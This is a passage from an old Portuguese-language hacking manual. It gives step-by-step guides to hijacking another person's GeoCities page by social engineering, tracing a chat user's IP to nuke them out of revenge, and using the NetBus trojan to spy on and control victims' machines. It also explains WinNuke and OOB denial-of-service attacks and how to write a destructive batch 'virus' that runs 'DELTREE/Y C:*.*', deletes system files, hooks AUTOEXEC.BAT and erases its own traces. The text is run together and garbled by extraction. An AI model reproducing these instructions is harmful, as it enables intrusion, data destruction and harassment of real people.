MÁQUINASDISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO EXPLORER VOCÊ PODERÁ VER OS 12
  13. 13. COMPUTADORES DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ UTILIZAR OSDISCOS MAPEANDO-OS, O QUE OS TORNARÁ UNIDADES DE SEU COMPUTADOR.COMO HACKEAR UMA PÁGINA DA GEOCITES?É A COISA MAIS FÁCIL DO MUNDO...ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI PORQUE ATÉ HOJE NÃO OUVI FALAR DENINGUÉM QUE TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS DIRETO AOASSUNTO:ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE.ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO:http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE VOCÊ SÓ VAI ANOTAR ODIRETÓRIO E O BLOCK.AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E CLIQUE NO LINK CONTACT GEOCITES,DEPOIS CLIQUE EM SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS REPORTINGFORM. LÁ VOCÊ VAI COLOCAR AS INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMACITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO ESPAÇO ABAIXO VOCÊ VAI COLOCAROPROBLEMA. DIGA QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS: "EXCUSE ME FORTHE UP SET, BUT I DIDN’T RECEIVE MY SIGNAL".PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3 OU 4 DIAS NO MÁXIMO QUE VOCÊRECEBE SUA SENHA!ASTREANDO IP PELO MS-DOSTODO MUNDO TEM O MS-DOS INSTALADO EM SEU COMPUTADOR, POR ISSO, QUASENINGUÉM SABE QUE TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA.MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP?ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO SE CONECTA A UM SERVIDOR.UM EXEMPLODE SERVIDOR DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROSREPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO NÚMERO QUE VARIA. NO BRASIL, 13
  14. 14. TODOS OS IP’S COMEÇAM COM 200.PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA CHAMADO ARP, PRESENTE NO DOS. OCOMANDO QUE DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE ENDEREÇOS DE IP.MAS COMO SABER QUAL É O DA PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMAINFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA PESSOA QUE VOCÊ QUER SABER OIP. E DAÍ ENTRAR COM O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O PRIMEIRO.TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O NETSTAT. COM ELE VOCÊ PODERASTREAR QUAL É O SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA ÉCOMPLICADO E VOCÊ QUER SABER COMO USÁ-LO DIGITE NETSTAT –H, E A TELA DE AJUDAAPARECE. O QUE FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A PESSOA. O NUKE ÉIUM PROGRAMA QUE ENVIA UMA MENSAGEM DE ERRO PELA PORTA 139, FAZENDO ACONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR O COMPUTADOR DA VÍTIMAUSANDO O BACK ORIFICE OU OUTRO PROGRAMA.MANUAL DO NETBUSHOST NAME/IP- COLOQUE O IP DA VÍTIMA.PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA SELECIONADA.IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE COMO ESTÁ.ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA LISTA.DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE.CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP DA COBAIA, SE CONECTE.SCAN- SCANEIA IP COM O PATCHE.SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS DA COBAIA. POSSUI ATÉ A OPÇÃOREMOVE A SERVER, OU SEJA, REMOVE O PATCHE DO MICRO DELA.OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA CONFORME VOCÊ CLIQUE.SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ APARECER NO MICRO DACOBAIA.SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE TROQUEM.START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA COBAIA. 14
  15. 15. MSG MANAGER- POSSIBILITA A VOCÊ MANDAR MENSAGENS DE ERRO, EDITADAS PORVOCÊ. VOCÊ PODE DEIXAR QUE ELA RESPONDA, OU NÃO...SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA COBAIA, SALVANDO A IMAGEM DACOBAIA NO SEU NETBUS.GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL ARQUIVO ELA ESTÁ INFECTADA,ETC.PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ UTILIZA PARA CONECTAR, MUITOCOMPLEXO, POIS EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ.PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO MICRO DA COBAIA. COLOQUE ALINHA DE COMANDO.EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO, VOCÊ ESCOLHE.SEND TEXT- SERVE PARA FALAR COM OUTROS INVASORES, CASO HAJA ALGUM.ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO PC DA VÍTIMA. VOCÊ PODE ATIVAR,FECHAR OU ABRIR QUALQUER JANELA.APP REDIRECT- BESTEIRAMOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O MOUSE DELA FICAR. A COBAIA VAIFICAR LOUCA...LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O QUE A PESSOA ESCREVE EESCREVER PARA ELA (HE, HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM CANALABERTO, PARA QUEIMAR O FILME DELA COM FRASES CABULOSAS.SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE SOM DA VÍTIMA. AUMENTE NOMÁXIMO E EXECUTE UMA FILE WAVE!SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS DA PESSOA.CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA.GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ PREFERIR, OU ODIAR, PARA A COBAIAIR.KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ PODE DESATIVAR TECLAS DO 15
  16. 16. TECLADO DA PESSOA. É MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE ASVOGAIS.FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO AO HD DA PESSOA E SUASPARTIÇÕES! TUDO, TUDO SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE QUISER!MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS JAMAIS APAGUE!O NUKEHÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE, PRINCIPALMENTE DEPOIS DOSURGIMENTO DO WINNUKE. SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SEESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM ALGUNS CASOS E EM OUTROSNÃO. INFELIZMENTE, ESSA CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO ÉNUKE! VAMOS ANALIZAR CADA UMA DAS DUAS TECNOLOGIAS COM PROFUNDIDADESUFICIENTE PARA DESFAZER ESTE EQUÍVOCO. INICIALMENTE, APRESENTAREMOS UM TEXTODE AUTORIA R.O QUE É NUKE?NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM PREMATURAMENTE COM UMACONEXÃO TCP ATRAVÉS DO ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS PACOTESPODEM SER DIRECIONADAS PARA O SERVIDOR, OU PARA O CLIENTE.TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A CONEXÃO FAZENDO COM QUEO CLIENTE OU O SERVIDOR SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUENORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO ENTRE OS DOIS. O EFEITO DETAL PROGRAMA PARA A VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE SEMEFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA COMO SE VOCÊ FOSSEDESCONECTADO DO SERVIDOR DE IRC.HISTÓRICOACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O NUKE.C, PARA UNIX. SEU AUTOR SECHAMAVA SATANIC MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP COMMENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR, FINALIZANDO ASSIM COM CONEXÕESTELNET. COM A CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO SERVIDOR PASSARAM A 16
  17. 17. NÃO SER MAIS EFICIENTES. PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO ENTANTO,O FATO DO CLIENTE NÃO POSSUIR UMA PORTA FIXA PARA FIXA PARA ESTABELECERCONEXÃO COM O SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA ISSO FOI ODEESENVOLOVIMENTO DE PROGRAMAS QUE VARREM SEQUENCIALMENTE TODAS ASPORTAS DO CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A 65535),BOMBARDEANDO ELAS COM MENSAGENS DE ERRO ATÉ QUE SE ENCONTRE A PORTA ONDESE DEU A CONEXÃO COM O SERVIDOR.O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA EM MUITO OS EQUIVALENTESPARA WINDOWS, ALÉM DE GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO ASLIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE NUKING DESENVOLVIDOS PARA OWINSOCK 2.2 JÁ ESTÃO SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS DO QUEOS SEUS ANTECESSORES PARA A PLATAFORMA MICROSOFT. ENTRE ESSES POSSO CITAR OCLICK4 QUE REALMENTE É MUITO MAIS PODEROSO.UM DOS PRIMEIROS PROGRAMAS NUKE PARA A PLATAFORMAWINDOWS, FOI O WNUKE. ÉUM APLICATIVO EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET WINSOCK PARAENVIAR OS PACOTES. FORAM LANÇADAS DIVERSAS VERSÕES DESTE PROGRAMA, CADAUMA IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO TIPO DE MENSAGEM ICMPENVIADA E DELAY ENTRE O ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA PODERIASER UTILIZADO POR PESSOAS QUE NÃO DISPÕE DE UMA CONEXÃO DE ALTA VELOCIDADECOM A INTERNET.COMO EU UTILIZO O NUKE?BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM O MESMO PRINCÍPIO:DEFINIR O ALVO DOS PACOTES;DEFINIR O HOST DO CLIENTE;DEFINIR O HOST DO SERVIDOR;DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE;DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR;DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS;UMA VEZ DETERMINADOS ESSES PARÂMETROS O PROGRAMA INICIA O ENVIO DE PACOTESDE ERRO. QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A INTERNET, MAIS RÁPIDO 17
  18. 18. SERÁ O ENVIO DOS PACOTES, E MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DAPORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A VARREDURA A PARTIR DA PORTA 6667,QUE É A PORTA DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC.O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER DETERMINADA PREFERENCIALMENTEPELO TIPO DE ALVO. SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE HOSTUNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA. NO CASO DE MÁQUINA WINDOWS,"PROTOCOL UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE.OOB: O BUG DA PORTA 139DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA TRAVAR SISTEMAS WINDOWS, GERANDODoS ATRAVÉS DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO COMO URGENTEPARA AS PORTAS ESPECÍFICAS, COMO POR EXEMPLO A PORTA 139. SISTEMAS WINDOWSNT SEM O HOTFIX.OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS OUTRAS PORTAS. APESAR DE SEREMCHAMADOS DE NUKE, NA VERDADE ESSES PREGRAMAS TEM FUNCIONAMENTOTOTALMENTE DIFERENTE, ELES APENAS SE APROVEITAM DE UMA FALHA DO SISTEMA.CONFORME DESCRITO EM SEÇÕES ANTERIORES, O FUNCIONAMENTO DE PROGRAMASNULE É DIFERENTE. OS EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTEPERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS ENTRA EM PÂNICO EGERALMENTE É NECESSÁRIA A REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO SEJANORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS PATCHES DISPONÍVEIS PARA RESOLVERESTE PROBLEMA.PINGA BOOMINICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS FALANDE DE CTCP PING, E SIM DOPROGRAMA PING QUE VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ ACESSÍVEL. O MAUUSO INTENCIONADO DESTE PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A REDEFAZ COM QUE A VÍTIMA CAIA NUM LAG QUE PROVAVELMENTE O LEVARÁ A DESCONEXÃOPOR PING TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES RECEBIDOS SUPERAR EM MUITO 18
  19. 19. A CAPACIDADE DE ESSES MESMOS SEREM DESENVOLVIDOS.WINNUKEUM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT PERMITE QUE USUÁRIOSEXTERNOS POSSAM DESATIVAR TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTEENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A DETERMINADAS PORTAS DOSEU COMPUTADOR (SENDO QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS DESABILTATOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA MÁQUINA RETORNANDO AO NORMALAPENAS APÓS O REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES DISPONÍVEIS QUESIMPLESMENTE FECHAM A PORTA 139. ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODESER EXECUTADO EM OUTRAS PORTAS MENOS USUAIS TAMBÉM. DA MESMA FORMA, OSDETETORES DE QUE SE DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE OOBTAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE LIMITAM-SE A OUVIR A PORTA 139.ALÉM DISSO, ELES NÃO DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ QUE OATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM NUKE CANÔNICO, MAS APENAS UMEXPLOIT DE UM BUG DO MICROSOFT WINSOCK.PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHATJÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM CHAT DE WWW E ALGUÉM TEXINGAR. XINGAR NÃO RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE VINGAR COMUM POUCO MAIS DE CLASSE? SERIA UMA BOA HEIN? QUE TAL NUKAR O OTÁRIO OUENTRAR EM NO SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO? ISSO SIM QUE ÉESTILO! COM UM RASTREADOR DE IP E ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODERLEGAL.PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE TAGS HTML É MAIS FÁCIL DO QUEPEGAR IP EM SALA QUE ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO PROMPT DOMS DOS E DIGITE ARP –A. COM ISSO IRÁ APARECER UM MONTE DE IP’S. O PRIMEIRO IP É OSEU EO ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA MENSAGEM. VAMOS SUPOR QUEO RICK TE MANDOU UMA MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI AO EDIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK. PRONTO, AGORA VOCÊ JÁ TEM O IPPROMPT DO MSDOS DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR O OTÁRIO. 19
  20. 20. OS VÍRUSOS VÍRUS PODEM SER CCATALOGADOS EM TRÊS CATEGORIAS BÁSICAS:VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS BASICAMENTE POR DISQUETES,COPIANDO-SE PARA O SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O COMPUTADOR LÊQUANDO É LIGADO). JÁ TIVERAM O SEU ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAISRAROS.VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS DE ARQUIVOS ESTESPROGRAMAS SE ANEXAM AO CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS,PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU .COM. QUANDO UM PROGRAMAINFECTADO É EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO COMPUTADOR E LÁ INFECTAOUTROS PROGRAMAS, EXECUTADOS POSTERIORMENTE.VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE GABARITOS (TEMPLATES) DOMICROSOFT OFFICE, PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR DESTACONTAMINAÇÃO. TODO O DOCUMENTO CRIADO POSSUIRÁ VÍRUS DENTRO DELE, E ESTE ÉUMA RAZÃO PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS DIFUNDIDA ATUALMENTE. AOUTRA É A RAZÃO DE SER MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM COMOASSEMBLER OU C++ UTILIZADA PELOS PROGRAMADORES DE VÍRUS EXECUTÁVEIS.UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A OPÇÃO DE PROTEÇÃO CONTRA VÍRUSHABILITADA NO WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENUFERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO CONRA VÍRUS DE MACRO. ASSIM,SEMPRE QUE ALGUM ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA OPÇÃO DEDESABILIITAR O SEU CARREGAMENTO.FAZER VÍRUSAGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS DE VÍRUS "SIMPLES". VÍRUS MAISCOMPLEXOS, EXIGEM CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO LUGAR VOCÊDEVE LOCALIZAR O ARQUIVO EDIT.COM NA PASTA C:WINDOWSCOMMAND. COM OARQUIVO ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O. IRÁ APARECER UMATELA AZUL. É UM EDITOR COM POUCOS RECURSOS. ENTÃO DIGITE: 20
  21. 21. @ECHO OFFBREAK OFFDEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE QUER FAZER.VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS ARQUIVOS DO PC ALHEIO. VOCÊ DEVEUSAR OS SEGUINTES COMANDOS:DELTREE/Y C:*.*CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA, USE OS SEGUINTES COMANDOS:DEL C:AUTOEXEC.BATDEL C:COMMAND.COMDEL C:CONFIG.SYSÉ UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR OS SEUS VÍRUS E PARA QUE ELESFAÇAM O QUE VOCÊ QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO VÍRUS).BATAUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA DE ESTAR EXECUTANDO O SEU VÍRUS AOINICIAR O COMPUTADOR ALVO.DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO .BAT, DE FORMA QUE FIQUE:OQUEQUISER.BAT. AGORA O SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O VÍRUSIRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS.IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA DISQUETE, VOCÊ NÃO DEVE ESQUECER DE 21
  22. 22. FINALIZAR O ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE PARA NÃO DEIXARVESTÍGIO DO SEU ATO INSANO.TELNETÉ O PROTOCOLO INTERNET PARA ESTABELECER CONEXÃO ENTRE COMPUTADORES.ATRAVÉS DESSA CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E COMANDOS EMOUTRA MÁQUINA, COMO SE O TECLADO DE SEU COMPUTADOR ESTIVESSE LIGADODIRETAMENTE A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É SEMELHANTE AO QUE SETEM EM BBS’S DE INTERFACE DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DAMESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE COMANDOS UNIX OU A PARTIR DEUM MENU DE COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM ALGUM LUGAR DATELA (ESTA ÚLTIMA É A MAIS COMUM ESTRE SERVIDORES QUE PERMITEM ACESSO AOPÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA DE INFORMAÇÕES ETRANFERÊNCIA DE ARQUIVOS – TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁCONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É MUITO USADO POR OPERADORESDE SISTEMAS (SYSOPS) A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ PENSAQUE O SYSOP DE SEU PROVEDOR SAI DE CASA TODA VEZ QUE TEM ALGUM PROBLEMA NOSSERVIDORES, ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A MANUTENÇÃO DE CASAMESMO, VIA TELNET.PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO UM PROGRAMA ESPECÍFICO. OWINDOWS 95 JÁ VEM COM UM.CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA NA PASTA WINDOWS, CLIQUE EMCONECTA, SISTEMA REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO AO QUALDESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E "TIPO DO TERMINAL" SELECIONE TELNETVT100. FEITO ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A CONEXÃO COM OCOMPUTADOR REMOTO. FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O SISTEMAREMOTO PEDE UMA SENHA. DIGITE "GUEST" E APERTE ENTER. ISTO ABRIRÁ AS PORTAS DOCOMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA SÉRIE DE OPÇÕES, PRECEDIDASDE UM NÚMERO OU LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS, DIGITE ALGUMDESSES NÚMEROS OU LETRAS E APERTE ENTER. EXPLORE O SISTEMA AO QUAL VOÊCONECTOU PARA EXERCITAR.COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS SERVIDORES NÃO PERMITE ACESSO AOPÚBLICO VIA TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE ENTRADA PARA HACKERS.NESTES SERVIDORES NÃO SE ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELOSITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A NECESSIDADE DE CONHCER ALGUNS 22
  23. 23. COMANDOS BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS VEZES VAI TER ACESSSO APROVEDORES DE PRESENÇA, DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUARALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE ABAIXO UMA LISTA QUE LHESERÃO MUUITO ÚTEIS NESTE CASO:LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIOLS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO, INCLUSIVE OS HIDDENCP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIO YMV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIOYRM X: DELETA O ARQUIVO XCD XXX: MUDA O DIRETÓRIO ATIVO PARA XXXCD..: SAI DE UM DIRETÓRIOMKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO ATUALRM XXX: REMOVE O DIREÓRIO XXXOS PROTOCOLOS TCP/IPPARA ENTENDER COMO ATAQUES FUNCIONAM, É NECESSÁRIO TER UMA PEQUENA NOÇÃODE COMO TRABALHA A INTERNET, OU PELO MENOS COMO FUNCIONA A SUA BASE DEPROTOCOLOS DE COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É CHAMADA TCP/IP.COMO SABEMOS, CADA COMPUTADOR LIGADO À INTERNET É IDENTIFICADO POR UMNÚMERO DE IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM NÚMERO DE IP FIXO,CADA VEZ QUE SE CONECTAM AO PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR 23
  24. 24. DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA MÁQUINA DENTRE MILHÕESCONECTADAS A INTERNET, ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA TROQUEINFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM MESMO ENDEREÇO DE IP 200.230.137.4PODE SER UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP. COMO UM CLIENTE DEWWW PEDE UM SERVIÇO PARA ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUSDIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE SURGE UM IMPORTANTECONCEITO, MUITAS VEZES NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARAPREENCHER OS VÁRIOS TIPOS DE ATAQUES DE CRACKERS, QUE É O DA "PORTA". AGORA,ALÉM DE DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS IDENTIFICAR OSSERVIÇOS QUE ELAS PRESTAM, E CADA UM DELES É IDENTIFICADO COM UM NÚMERODIFERENTE. ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS CONFUSÃO. POREXEMPLO, PARA UTILIZAR O SERVIÇO DE WWW DA NOSSA MÁQUINA 200.230.137.4, BASTAABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA A PORTA 21, O ICQ USA PORTASNA FAIXA 1000-2000, E IRC PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535 NÚMEROSDISPONÍVEIS PARA SEREM UTILIZADOS EM UMA ÚNICA MÁQUINA. QUANTO MAISSERVIÇOS A MÁQUINA OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO DISPONIBILIZADOS.ATÉ MESMO A SUA MÁQUINA WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECESERVIÇO NENHUM, TEM PORTAS ABERTAS.A COLETA DE DADOSUM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É AQUELE QUE EXPLORA AVULNERABILIDADE EXISTENTE EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA.COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É ACESSADO ATRAVÉS DACAMADATCP/IP, E SÃO IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AOPRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO DO TCP/IP TAMBÉM SÃOFREQUENTES, COMO IREMOS VER A SERGUIR.PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA SERGURANÇA NOS VÁRIOSSISTEMAS DE SUA MÁQUINA, ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL. EXSTEMDOIS MÉTODOS BASTANTE UTILIZADOS PARA ESTE TIPO DE COLETA DE DADOS. AVARREDURA DE PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL (FINGERPRINT) DO SISTEMAOPERACIONAL.PORT SCANSUSANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA SONDAS (PACOTES IP ESPECIAIS),TENTANDO ESTABELECER CONEXÕES COM CADA UMA DAS 65535 PORTAS DO SEUCOMPUTADOR. SE EXISTE ALGUM SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ 24
